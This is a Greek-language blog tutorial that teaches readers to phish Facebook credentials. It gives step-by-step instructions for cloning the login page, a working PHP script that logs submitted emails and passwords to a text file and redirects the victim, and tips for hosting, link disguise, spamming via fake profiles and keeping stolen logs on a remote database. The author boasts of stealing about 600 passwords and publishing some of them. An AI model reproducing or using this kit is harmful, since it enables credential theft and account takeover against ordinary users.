Το Phishing στην ουσία δεν είναι τίποτα περίπλοκο (εξαρτάται βέβαια από το πού θελουμε να ψαρέψουμε), είναι απλά μια μέθοδος που βασίζεται στην άγνοια και την απροσεξία του απλού χρήστη του ίντερνετ. Παντού υπάρχουν ζώα που δίνουν τους κωδικούς τους όπου τους ζητηθεί. Είχα την ευκαιρία να το αποδείξω στον εαυτό μου ψαρεύοντας πάνω κάτω 600 Φατσο-κωδικούς μέσα σε 5-6 μέρες. Οι 212 από αυτούς είναι εδώ και μήνες δημοσιευμένοι στο άλλο μου blog.
Αυτό που θα κάνουμε εδώ είναι το πιο απλό παράδειγμα Phishing, λόγο της απλότητας του Facebook. Πιο περίπλοκες σελίδες, στις οποίες πρέπει να ελέγχουμε για το αν τα στοιχεία που συλλέγουμε είναι σωστα (π.χ. PayPal), θέλουν δουλειά και γνωσεις. Προς το παρόν θα δούμε το Facebook και με τον καιρό θα φτάσουμε και στα "δύσκολα".
Τί χρειαζόμαστε για να ψαρέψουμε:
- Μία ίδια σελίδα με το Facebook Login - την οποία θα φτιάξουμε σε λίγο
- Έναν Web Hoster για να κάνουμε Upload το "δόλωμα" - ripway.com π.χ.
- Ελάχιστη γνώση PHP/HTML - Θα σας δείξω εγώ τί και πώς, αλλά διαβάστε λίγο
- Πολλούς Friends - Σχετικούς ή άσχετους. Φτιάξτε ένα προφίλ με φωτό γκόμενας anyway
- Προαιρετικά Groups - Για πιο πολλούς targets
- URL Rename/Shorten Service - Το οποίο να μην μπλοκάρει το Facebook (π.χ. .tk)
- Καφέ από την Αφροδίτη και μπόλικο θράσσος
Αρχίζοντας:
Είπαμε και πριν ότι χρειαζόμαστε μία ίδια σελίδα με το ΦατσοΒιβλίο, άρα θα φτιάξουμε ένα πιστό αντίγραφο. Το όλο θέμα είναι να κάνουμε ενα Facebook (Στην όψη) το οποίο αντί να στέλνει το email και το password των θυμάτων στο Facebook, θα τα κρατάει σε ένα Text για εμάς και μετά... θα γυρίζει το θύμα στο κανονικό Facebook. Απλό δεν ακούγεται?
Φτιάχνοντας ένα απλό Phishing Page:
- Πηγαίνουμε στο facebook.com - ΔΕΝ ΚΑΝΟΥΜΕ LOGIN
- Κάνουμε SAVE την σελίδα που βλέπουμε - The WHOLE page (default)
- Ανοίγουμε Notepad και σέρνουμε μέσα την σελίδα που κάναμε Save
- Με CTRL+F (find) ψάχνουμε για "form" ή "action"
- Πρέπει να βρούμε την φόρμα που στέλνει τα στοιχεία (π.χ. action=www.facebook.com/login κλπ)
- Αλλάζουμε το facebook.com μέχρι το τέλος σε "eleos.php"
- Αλλάζουμε το METHOD της φόρμας από method=post σε method=get
- Κάνουμε SAVE στο Notepad και File -> New και γράφουμε το επόμενο Script
<?php header("Location: http://www.facebook.com/profile.php?id=547627539&ref=nf"); $handle = fopen("kodikoi.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Κάνουμε SAVE το Script σαν "eleos.php" στον ΙΔΙΟ φάκελο με την σελίδα μας... και έτοιμος ο Μπούμπης!!! Κάνουμε και ένα καινούριο Text με όνομα kodikoi.txt, το ρίχνουμε στον ίδιο φάκελο και τέλος....
Ανεβάζουμε ΌΛΑ τα αρχεία που έχουμε στο ripway, κάνουμε rename σε .tk... και είναι πλέον όλα έτοιμα ;)
Το μόνο που μένει τώρα είναι να το spammάρουμε στο Facebook και να περιμένουμε.
Last words:
Με αυτόν τον τρόπο τα LOGS μας δεν είναι και τόσο καθαρά. Δηλαδή δεν γράφονται ΜΟΝΟ το email και το password του χρήστη αλλά γράφεται όλη η φόρμα και ό,τι στέλνει αυτή. Μπορείτε να κρατάτε μόνο αυτά που θέλετε αν μάθετε να κάνετε handling απλών μεταβλητών. Επίσης, αντί να κρατάμε τα LOGS σε κείμενο, θα μπορούσαμε να έχουμε μια SQL Database σε ΑΛΛΟ Host έτσι ώστε αν μας διαγράψουν το Account να έχουμε ακόμη τα passwords. Και τέλος, μην κάνετε ΠΟΤΕ redirect κατευθείαν στο Facebook. Κάντε το όπως εγώ ---- http://www.facebook.com/profile.php?id=547627539&ref=nf
Happy Phishing...
